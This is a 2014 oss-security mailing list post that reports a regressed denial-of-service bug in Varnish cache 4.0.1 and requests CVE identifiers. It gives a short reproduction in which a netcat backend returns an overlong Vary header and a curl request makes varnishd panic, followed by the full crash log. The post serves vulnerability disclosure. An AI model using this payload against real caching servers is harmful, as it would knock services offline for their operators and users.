Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Wed, 2 Jul 2014 17:57:01 +0100
From: Marek Kroemeke <kroemeke@...il.com>
To: oss-security@...ts.openwall.com
Subject: Varnish - no CVE == bug regression

Hi there,

Latest version of Varnish cache (4.0.1 https://www.varnish-cache.org/ ) has 
the same DoS vulnerability that 3.x had (which was subsequently fixed in 
that branch). 

Any chance to allocate some CVEs for the below so that this 
doesn't happen again ?

http://seclists.org/fulldisclosure/2013/Mar/55
http://seclists.org/fulldisclosure/2013/Mar/61
http://seclists.org/fulldisclosure/2013/Mar/63
http://seclists.org/fulldisclosure/2013/Mar/58


How to replicate (assuming varnish proxies to port 8100) :

"HTTP/1.1 200 foo\r\nVary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n"  | nc.traditional -l -p8100

curl http://localhost:6081/

-- cut --
Jul  2 18:32:09 localhost varnishd[6145]: Child (21893) Panic message:#012Assert error in http_GetHdr(), cache/cache_http.c line 347:#012  Condition(l == strlen(hdr + 1)) not true.#012thread = (cache-worker)#012ident = Linux,3.2.0-58-generic,x86_64,-smalloc,-smalloc,-hcritbit,epoll#012Backtrace:#012  0x42fdd9: pan_ic+0x1a0#012  0x426267: http_GetHdr+0x5b#012  0x43a951: VRY_Create+0x375#012  0x41c930: vbf_beresp2obj+0x40#012  0x41e766: vbf_fetch_thread+0x1949#012  0x432b7d: Pool_Work_Thread+0x5e8#012  0x4444da: wrk_thread_real+0xfc#012  0x444698: WRK_thread+0x16#012  0x7f21da3cfe9a: /lib/x86_64-linux-gnu/libpthread.so.0(+0x7e9a) [0x7f21da3cfe9a]#012  0x7f21da0fc3fd: /lib/x86_64-linux-gnu/libc.so.6(clone+0x6d) [0x7f21da0fc3fd]#012  busyobj = 0x7f21a4090a90 {#012    ws = 0x7f21a4090b50 {#012      id = "bo",#012      {s,f,r,e} = {0x7f21a4092a70,+456,(nil),+57376},#012    },#012  refcnt = 2#012  retries = 0#012  failed = 0#012  state = 1#012    is_do_stream#012    is_is_gunzip#012    bodystatus = 4 (eof),#012    },#012    http[bereq] = {#012      ws = 0x7f21a4090b50[bo]#012        "GET",#012        "/",#012        "HTTP/1.1",#012        "User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3",#012        "Host: localhost:6081",#012        "Accept: */*",#012        "X-Forwarded-For: 127.0.0.1",#012        "Accept-Encoding: gzip",#012        "X-Varnish: 3",#012    },#012    http[beresp] = {#012      ws = 0x7f21a4090b50[bo]#012        "HTTP/1.1",#012        "200",#012        "foo",#012        "Vary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",#012        "Date: Wed, 02 Jul 2014 16:32:07 GMT",#012    },#012    ws = 0x7f21a4090cd8 { BAD_MAGIC(0x00000000) },#012    },#012  objcore (FETCH) = 0x7f2198000950 {#012    refcnt = 2#012    flags = 0x2#012    objhead = 0x7f21980009e0#012  }#012  }#012
-- cut --


regards,
AKAT-1
22733db72ab3ed94b5f8a1ffcde850251fe6f466
Marek Kroemeke

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.